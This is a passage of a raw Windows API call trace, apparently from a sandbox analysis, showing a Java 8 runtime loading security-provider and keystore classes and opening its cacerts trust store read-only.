liDistanceToMove=0x17a5b31, lpNewFilePointer=0x208dc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc60*=24795953) returned 1 [0117.444] ReadFile (in: hFile=0x134, lpBuffer=0x208dcb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dc30, lpOverlapped=0x0 | out: lpBuffer=0x208dcb0*, lpNumberOfBytesRead=0x208dc30*=0x1e, lpOverlapped=0x0) returned 1 [0117.445] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17a5b73, lpNewFilePointer=0x208dcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcc0*=24796019) returned 1 [0117.445] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0xbbb, lpNumberOfBytesRead=0x208dc90, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208dc90*=0xbbb, lpOverlapped=0x0) returned 1 [0117.447] free (_Block=0x12ef5510) [0117.447] free (_Block=0x12e60460) [0117.453] strlen (_Str="sun/security/provider/certpath/AlgorithmChecker.class") returned 0x35 [0117.453] malloc (_Size=0x48) returned 0x12e60640 [0117.453] malloc (_Size=0xa0) returned 0x12dabec0 [0117.453] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dd6ff, lpNewFilePointer=0x208e060, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208e060*=54384383) returned 1 [0117.453] ReadFile (in: hFile=0x134, lpBuffer=0x12dabec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208e030, lpOverlapped=0x0 | out: lpBuffer=0x12dabec0*, lpNumberOfBytesRead=0x208e030*=0xa0, lpOverlapped=0x0) returned 1 [0117.454] malloc (_Size=0x36) returned 0x12ef5590 [0117.455] strlen (_Str="sun/security/provider/certpath/AlgorithmChecker.class") returned 0x35 [0117.455] strcpy (in: _Dest=0x208e1e0, _Source="sun/security/provider/certpath/AlgorithmChecker.class" | out: _Dest="sun/security/provider/certpath/AlgorithmChecker.class") returned="sun/security/provider/certpath/AlgorithmChecker.class" [0117.455] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2836fcc, lpNewFilePointer=0x208dc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc60*=42168268) returned 1 [0117.455] ReadFile (in: hFile=0x134, lpBuffer=0x208dcb0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208dc30, lpOverlapped=0x0 | out: lpBuffer=0x208dcb0*, lpNumberOfBytesRead=0x208dc30*=0x1e, lpOverlapped=0x0) returned 1 [0117.458] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x283701f, lpNewFilePointer=0x208dcc0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dcc0*=42168351) returned 1 [0117.458] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x2272, lpNumberOfBytesRead=0x208dc90, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208dc90*=0x2272, lpOverlapped=0x0) returned 1 [0117.459] free (_Block=0x12e667c0) [0117.459] free (_Block=0x12e60190) [0117.473] strlen (_Str="sun/security/util/DisabledAlgorithmConstraints$jdkCAConstraint.class") returned 0x44 [0117.474] malloc (_Size=0x48) returned 0x12e602d0 [0117.474] malloc (_Size=0xa0) returned 0x12daace0 [0117.474] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2fa1, lpNewFilePointer=0x208d880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d880*=54407073) returned 1 [0117.474] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d850, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208d850*=0xa0, lpOverlapped=0x0) returned 1 [0117.474] malloc (_Size=0x45) returned 0x12e60c80 [0117.474] strlen (_Str="sun/security/util/DisabledAlgorithmConstraints$jdkCAConstraint.class") returned 0x44 [0117.474] strcpy (in: _Dest=0x208da00, _Source="sun/security/util/DisabledAlgorithmConstraints$jdkCAConstraint.class" | out: _Dest="sun/security/util/DisabledAlgorithmConstraints$jdkCAConstraint.class") returned="sun/security/util/DisabledAlgorithmConstraints$jdkCAConstraint.class" [0117.475] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294a126, lpNewFilePointer=0x208d480, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d480*=43295014) returned 1 [0117.475] ReadFile (in: hFile=0x134, lpBuffer=0x208d4d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d450, lpOverlapped=0x0 | out: lpBuffer=0x208d4d0*, lpNumberOfBytesRead=0x208d450*=0x1e, lpOverlapped=0x0) returned 1 [0117.476] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294a188, lpNewFilePointer=0x208d4e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d4e0*=43295112) returned 1 [0117.476] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x700, lpNumberOfBytesRead=0x208d4b0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208d4b0*=0x700, lpOverlapped=0x0) returned 1 [0117.476] free (_Block=0x12ef5590) [0117.476] free (_Block=0x12e60640) [0117.482] strlen (_Str="sun/security/util/DisabledAlgorithmConstraints$UsageConstraint.class") returned 0x44 [0117.482] malloc (_Size=0x48) returned 0x12e60640 [0117.482] malloc (_Size=0xa0) returned 0x12dac650 [0117.482] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e2f2f, lpNewFilePointer=0x208d880, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d880*=54406959) returned 1 [0117.482] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d850, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208d850*=0xa0, lpOverlapped=0x0) returned 1 [0117.482] malloc (_Size=0x45) returned 0x12e60cd0 [0117.483] strlen (_Str="sun/security/util/DisabledAlgorithmConstraints$UsageConstraint.class") returned 0x44 [0117.483] strcpy (in: _Dest=0x208da00, _Source="sun/security/util/DisabledAlgorithmConstraints$UsageConstraint.class" | out: _Dest="sun/security/util/DisabledAlgorithmConstraints$UsageConstraint.class") returned="sun/security/util/DisabledAlgorithmConstraints$UsageConstraint.class" [0117.483] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294972d, lpNewFilePointer=0x208d480, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d480*=43292461) returned 1 [0117.483] ReadFile (in: hFile=0x134, lpBuffer=0x208d4d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d450, lpOverlapped=0x0 | out: lpBuffer=0x208d4d0*, lpNumberOfBytesRead=0x208d450*=0x1e, lpOverlapped=0x0) returned 1 [0117.483] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x294978f, lpNewFilePointer=0x208d4e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d4e0*=43292559) returned 1 [0117.483] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x997, lpNumberOfBytesRead=0x208d4b0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208d4b0*=0x997, lpOverlapped=0x0) returned 1 [0117.484] free (_Block=0x12e60c80) [0117.484] free (_Block=0x12e602d0) [0117.526] malloc (_Size=0x48) returned 0x12e602d0 [0117.526] malloc (_Size=0xa0) returned 0x12dac440 [0117.526] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e25e5, lpNewFilePointer=0x208dc60, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208dc60*=54404581) returned 1 [0117.526] ReadFile (in: hFile=0x134, lpBuffer=0x12dac440, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208dc30, lpOverlapped=0x0 | out: lpBuffer=0x12dac440*, lpNumberOfBytesRead=0x208dc30*=0xa0, lpOverlapped=0x0) returned 1 [0117.526] malloc (_Size=0x2b) returned 0x12ef5210 [0117.526] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29326bc, lpNewFilePointer=0x208d860, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d860*=43198140) returned 1 [0117.526] ReadFile (in: hFile=0x134, lpBuffer=0x208d8b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d830, lpOverlapped=0x0 | out: lpBuffer=0x208d8b0*, lpNumberOfBytesRead=0x208d830*=0x1e, lpOverlapped=0x0) returned 1 [0117.529] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2932704, lpNewFilePointer=0x208d8c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d8c0*=43198212) returned 1 [0117.529] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x6f8, lpNumberOfBytesRead=0x208d890, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208d890*=0x6f8, lpOverlapped=0x0) returned 1 [0117.530] malloc (_Size=0x48) returned 0x12e60c80 [0117.530] malloc (_Size=0xa0) returned 0x12dab5d0 [0117.530] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e258b, lpNewFilePointer=0x208d5e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d5e0*=54404491) returned 1 [0117.530] ReadFile (in: hFile=0x134, lpBuffer=0x12dab5d0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208d5b0, lpOverlapped=0x0 | out: lpBuffer=0x12dab5d0*, lpNumberOfBytesRead=0x208d5b0*=0xa0, lpOverlapped=0x0) returned 1 [0117.530] malloc (_Size=0x2d) returned 0x12ef4bd0 [0117.531] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2931d72, lpNewFilePointer=0x208d1e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d1e0*=43195762) returned 1 [0117.531] ReadFile (in: hFile=0x134, lpBuffer=0x208d230, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208d1b0, lpOverlapped=0x0 | out: lpBuffer=0x208d230*, lpNumberOfBytesRead=0x208d1b0*=0x1e, lpOverlapped=0x0) returned 1 [0117.531] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2931dbc, lpNewFilePointer=0x208d240, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208d240*=43195836) returned 1 [0117.531] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x900, lpNumberOfBytesRead=0x208d210, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208d210*=0x900, lpOverlapped=0x0) returned 1 [0117.533] malloc (_Size=0x48) returned 0x12e60730 [0117.533] malloc (_Size=0xa0) returned 0x12daace0 [0117.533] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3331c10, lpNewFilePointer=0x208c680, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c680*=53681168) returned 1 [0117.533] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c650, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c650*=0xa0, lpOverlapped=0x0) returned 1 [0117.533] malloc (_Size=0x1d) returned 0x12e66d30 [0117.533] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1783f87, lpNewFilePointer=0x208c280, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c280*=24657799) returned 1 [0117.534] ReadFile (in: hFile=0x134, lpBuffer=0x208c2d0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c250, lpOverlapped=0x0 | out: lpBuffer=0x208c2d0*, lpNumberOfBytesRead=0x208c250*=0x1e, lpOverlapped=0x0) returned 1 [0117.534] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1783fc1, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=24657857) returned 1 [0117.534] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x1ce2, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c2b0*=0x1ce2, lpOverlapped=0x0) returned 1 [0117.540] strlen (_Str="java/security/KeyStoreSpi") returned 0x19 [0117.541] strlen (_Str="java/security/KeyStoreSpi.class") returned 0x1f [0117.541] malloc (_Size=0x48) returned 0x12e609b0 [0117.541] malloc (_Size=0xa0) returned 0x12dac2e0 [0117.541] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3331cad, lpNewFilePointer=0x208cd30, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cd30*=53681325) returned 1 [0117.541] ReadFile (in: hFile=0x134, lpBuffer=0x12dac2e0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cd00, lpOverlapped=0x0 | out: lpBuffer=0x12dac2e0*, lpNumberOfBytesRead=0x208cd00*=0xa0, lpOverlapped=0x0) returned 1 [0117.541] malloc (_Size=0x20) returned 0x12e663d0 [0117.541] strlen (_Str="java/security/KeyStoreSpi.class") returned 0x1f [0117.542] strcpy (in: _Dest=0x208ceb0, _Source="java/security/KeyStoreSpi.class" | out: _Dest="java/security/KeyStoreSpi.class") returned="java/security/KeyStoreSpi.class" [0117.542] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1785ead, lpNewFilePointer=0x208c930, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c930*=24665773) returned 1 [0117.542] ReadFile (in: hFile=0x134, lpBuffer=0x208c980, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c900, lpOverlapped=0x0 | out: lpBuffer=0x208c980*, lpNumberOfBytesRead=0x208c900*=0x1e, lpOverlapped=0x0) returned 1 [0117.542] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x1785eea, lpNewFilePointer=0x208c990, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c990*=24665834) returned 1 [0117.542] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x162d, lpNumberOfBytesRead=0x208c960, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c960*=0x162d, lpOverlapped=0x0) returned 1 [0117.543] free (_Block=0x12e66d30) [0117.543] free (_Block=0x12e60730) [0117.546] strlen (_Str="sun/security/provider/JavaKeyStore$DualFormatJKS") returned 0x30 [0117.546] malloc (_Size=0x48) returned 0x12e60190 [0117.546] malloc (_Size=0xa0) returned 0x12dab260 [0117.546] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc1e3, lpNewFilePointer=0x208cbb0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208cbb0*=54378979) returned 1 [0117.546] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208cb80, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208cb80*=0xa0, lpOverlapped=0x0) returned 1 [0117.546] malloc (_Size=0x37) returned 0x12ef46d0 [0117.546] strlen (_Str="sun/security/provider/JavaKeyStore$DualFormatJKS.class") returned 0x36 [0117.546] strcpy (in: _Dest=0x208cd30, _Source="sun/security/provider/JavaKeyStore$DualFormatJKS.class" | out: _Dest="sun/security/provider/JavaKeyStore$DualFormatJKS.class") returned="sun/security/provider/JavaKeyStore$DualFormatJKS.class" [0117.547] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280b4f3, lpNewFilePointer=0x208c7b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c7b0*=41989363) returned 1 [0117.547] ReadFile (in: hFile=0x134, lpBuffer=0x208c800, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c780, lpOverlapped=0x0 | out: lpBuffer=0x208c800*, lpNumberOfBytesRead=0x208c780*=0x1e, lpOverlapped=0x0) returned 1 [0117.550] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280b547, lpNewFilePointer=0x208c810, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c810*=41989447) returned 1 [0117.550] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0xba7, lpNumberOfBytesRead=0x208c7e0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208c7e0*=0xba7, lpOverlapped=0x0) returned 1 [0117.552] free (_Block=0x12e663d0) [0117.552] free (_Block=0x12e609b0) [0117.558] strlen (_Str="sun/security/provider/KeyStoreDelegator.class") returned 0x2d [0117.558] malloc (_Size=0x48) returned 0x12e60910 [0117.558] malloc (_Size=0xa0) returned 0x12daad90 [0117.558] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc470, lpNewFilePointer=0x208c170, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c170*=54379632) returned 1 [0117.558] ReadFile (in: hFile=0x134, lpBuffer=0x12daad90, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c140, lpOverlapped=0x0 | out: lpBuffer=0x12daad90*, lpNumberOfBytesRead=0x208c140*=0xa0, lpOverlapped=0x0) returned 1 [0117.558] malloc (_Size=0x2e) returned 0x12ef5550 [0117.558] strlen (_Str="sun/security/provider/KeyStoreDelegator.class") returned 0x2d [0117.559] strcpy (in: _Dest=0x208c2f0, _Source="sun/security/provider/KeyStoreDelegator.class" | out: _Dest="sun/security/provider/KeyStoreDelegator.class") returned="sun/security/provider/KeyStoreDelegator.class" [0117.559] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x28102fe, lpNewFilePointer=0x208bd70, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bd70*=42009342) returned 1 [0117.559] ReadFile (in: hFile=0x134, lpBuffer=0x208bdc0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208bd40, lpOverlapped=0x0 | out: lpBuffer=0x208bdc0*, lpNumberOfBytesRead=0x208bd40*=0x1e, lpOverlapped=0x0) returned 1 [0117.560] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2810349, lpNewFilePointer=0x208bdd0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bdd0*=42009417) returned 1 [0117.560] ReadFile (in: hFile=0x134, lpBuffer=0x12e6bff0, nNumberOfBytesToRead=0x1610, lpNumberOfBytesRead=0x208bda0, lpOverlapped=0x0 | out: lpBuffer=0x12e6bff0*, lpNumberOfBytesRead=0x208bda0*=0x1610, lpOverlapped=0x0) returned 1 [0117.561] free (_Block=0x12ef46d0) [0117.561] free (_Block=0x12e60190) [0117.576] strlen (_Str="sun/security/provider/JavaKeyStore$JKS.class") returned 0x2c [0117.576] malloc (_Size=0x48) returned 0x12e60550 [0117.576] malloc (_Size=0xa0) returned 0x12daace0 [0117.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc247, lpNewFilePointer=0x208be90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be90*=54379079) returned 1 [0117.577] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be60, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208be60*=0xa0, lpOverlapped=0x0) returned 1 [0117.577] malloc (_Size=0x2d) returned 0x12ef54d0 [0117.577] strlen (_Str="sun/security/provider/JavaKeyStore$JKS.class") returned 0x2c [0117.577] strcpy (in: _Dest=0x208c010, _Source="sun/security/provider/JavaKeyStore$JKS.class" | out: _Dest="sun/security/provider/JavaKeyStore$JKS.class") returned="sun/security/provider/JavaKeyStore$JKS.class" [0117.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280c0ee, lpNewFilePointer=0x208ba90, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba90*=41992430) returned 1 [0117.577] ReadFile (in: hFile=0x134, lpBuffer=0x208bae0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ba60, lpOverlapped=0x0 | out: lpBuffer=0x208bae0*, lpNumberOfBytesRead=0x208ba60*=0x1e, lpOverlapped=0x0) returned 1 [0117.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280c138, lpNewFilePointer=0x208baf0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208baf0*=41992504) returned 1 [0117.578] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x906, lpNumberOfBytesRead=0x208bac0, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208bac0*=0x906, lpOverlapped=0x0) returned 1 [0117.578] free (_Block=0x12ef5550) [0117.579] free (_Block=0x12e60910) [0117.585] strlen (_Str="sun/security/provider/JavaKeyStore.class") returned 0x28 [0117.585] malloc (_Size=0x48) returned 0x12e602d0 [0117.585] malloc (_Size=0xa0) returned 0x12dab100 [0117.585] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc367, lpNewFilePointer=0x208b450, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b450*=54379367) returned 1 [0117.585] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b420, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208b420*=0xa0, lpOverlapped=0x0) returned 1 [0117.585] malloc (_Size=0x29) returned 0x12ef5450 [0117.585] strlen (_Str="sun/security/provider/JavaKeyStore.class") returned 0x28 [0117.585] strcpy (in: _Dest=0x208b5d0, _Source="sun/security/provider/JavaKeyStore.class" | out: _Dest="sun/security/provider/JavaKeyStore.class") returned="sun/security/provider/JavaKeyStore.class" [0117.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280cea2, lpNewFilePointer=0x208b050, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b050*=41995938) returned 1 [0117.586] ReadFile (in: hFile=0x134, lpBuffer=0x208b0a0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b020, lpOverlapped=0x0 | out: lpBuffer=0x208b0a0*, lpNumberOfBytesRead=0x208b020*=0x1e, lpOverlapped=0x0) returned 1 [0117.586] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280cee8, lpNewFilePointer=0x208b0b0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b0b0*=41996008) returned 1 [0117.586] ReadFile (in: hFile=0x134, lpBuffer=0x12e6bd50, nNumberOfBytesToRead=0x2277, lpNumberOfBytesRead=0x208b080, lpOverlapped=0x0 | out: lpBuffer=0x12e6bd50*, lpNumberOfBytesRead=0x208b080*=0x2277, lpOverlapped=0x0) returned 1 [0117.587] free (_Block=0x12ef54d0) [0117.587] free (_Block=0x12e60550) [0117.594] strlen (_Str="sun/security/pkcs12/PKCS12KeyStore.class") returned 0x28 [0117.594] malloc (_Size=0x48) returned 0x12e60aa0 [0117.594] malloc (_Size=0xa0) returned 0x12daae40 [0117.594] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33db491, lpNewFilePointer=0x208be80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be80*=54375569) returned 1 [0117.594] ReadFile (in: hFile=0x134, lpBuffer=0x12daae40, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208be50, lpOverlapped=0x0 | out: lpBuffer=0x12daae40*, lpNumberOfBytesRead=0x208be50*=0xa0, lpOverlapped=0x0) returned 1 [0117.595] malloc (_Size=0x29) returned 0x12ef5410 [0117.595] strlen (_Str="sun/security/pkcs12/PKCS12KeyStore.class") returned 0x28 [0117.596] strcpy (in: _Dest=0x208c000, _Source="sun/security/pkcs12/PKCS12KeyStore.class" | out: _Dest="sun/security/pkcs12/PKCS12KeyStore.class") returned="sun/security/pkcs12/PKCS12KeyStore.class" [0117.596] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x27e15bd, lpNewFilePointer=0x208ba80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba80*=41817533) returned 1 [0117.596] ReadFile (in: hFile=0x134, lpBuffer=0x208bad0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208ba50, lpOverlapped=0x0 | out: lpBuffer=0x208bad0*, lpNumberOfBytesRead=0x208ba50*=0x1e, lpOverlapped=0x0) returned 1 [0117.597] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x27e1603, lpNewFilePointer=0x208bae0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208bae0*=41817603) returned 1 [0117.598] ReadFile (in: hFile=0x134, lpBuffer=0x13061db0, nNumberOfBytesToRead=0x8067, lpNumberOfBytesRead=0x208bab0, lpOverlapped=0x0 | out: lpBuffer=0x13061db0*, lpNumberOfBytesRead=0x208bab0*=0x8067, lpOverlapped=0x0) returned 1 [0117.599] free (_Block=0x12ef5450) [0117.600] free (_Block=0x12e602d0) [0117.612] malloc (_Size=0x48) returned 0x12e60820 [0117.612] malloc (_Size=0xa0) returned 0x12dabec0 [0117.612] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33dc413, lpNewFilePointer=0x208be20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208be20*=54379539) returned 1 [0117.612] ReadFile (in: hFile=0x134, lpBuffer=0x12dabec0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208bdf0, lpOverlapped=0x0 | out: lpBuffer=0x12dabec0*, lpNumberOfBytesRead=0x208bdf0*=0xa0, lpOverlapped=0x0) returned 1 [0117.612] malloc (_Size=0x30) returned 0x12ef5010 [0117.612] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280ff6a, lpNewFilePointer=0x208ba20, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba20*=42008426) returned 1 [0117.612] ReadFile (in: hFile=0x134, lpBuffer=0x208ba70, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b9f0, lpOverlapped=0x0 | out: lpBuffer=0x208ba70*, lpNumberOfBytesRead=0x208b9f0*=0x1e, lpOverlapped=0x0) returned 1 [0117.612] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x280ffb7, lpNewFilePointer=0x208ba80, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208ba80*=42008503) returned 1 [0117.613] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0x347, lpNumberOfBytesRead=0x208ba50, lpOverlapped=0x0 | out: lpBuffer=0x12e6b280*, lpNumberOfBytesRead=0x208ba50*=0x347, lpOverlapped=0x0) returned 1 [0117.615] wcslen (_String="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\cacerts") returned 0x37 [0117.615] malloc (_Size=0x7a) returned 0x12e6a810 [0117.615] wcscpy (in: _Dest=0x12e6a810, _Source="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\cacerts" | out: _Dest="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\cacerts") returned="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\cacerts" [0117.615] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_171\\lib\\security\\cacerts" (normalized: "c:\\program files\\java\\jre1.8.0_171\\lib\\security\\cacerts"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d4 [0117.616] free (_Block=0x12e6a810) [0117.623] strlen (_Str="java/io/DataInputStream.class") returned 0x1d [0117.624] malloc (_Size=0x48) returned 0x12e608c0 [0117.624] malloc (_Size=0xa0) returned 0x12dab520 [0117.624] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3408c05, lpNewFilePointer=0x208c670, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c670*=54561797) returned 1 [0117.624] ReadFile (in: hFile=0x134, lpBuffer=0x12dab520, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c640, lpOverlapped=0x0 | out: lpBuffer=0x12dab520*, lpNumberOfBytesRead=0x208c640*=0xa0, lpOverlapped=0x0) returned 1 [0117.626] malloc (_Size=0x1e) returned 0x12e66ca0 [0117.626] strlen (_Str="java/io/DataInputStream.class") returned 0x1d [0117.628] strcpy (in: _Dest=0x208c7f0, _Source="java/io/DataInputStream.class" | out: _Dest="java/io/DataInputStream.class") returned="java/io/DataInputStream.class" [0117.628] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e61a62, lpNewFilePointer=0x208c270, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c270*=48634466) returned 1 [0117.628] ReadFile (in: hFile=0x134, lpBuffer=0x208c2c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c240, lpOverlapped=0x0 | out: lpBuffer=0x208c2c0*, lpNumberOfBytesRead=0x208c240*=0x1e, lpOverlapped=0x0) returned 1 [0117.630] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2e61a9d, lpNewFilePointer=0x208c2d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2d0*=48634525) returned 1 [0117.630] ReadFile (in: hFile=0x134, lpBuffer=0x12e6b280, nNumberOfBytesToRead=0xfd5, lpNumberOfBytesRead=0x208c2a0, lpOverlapped=0x0 | 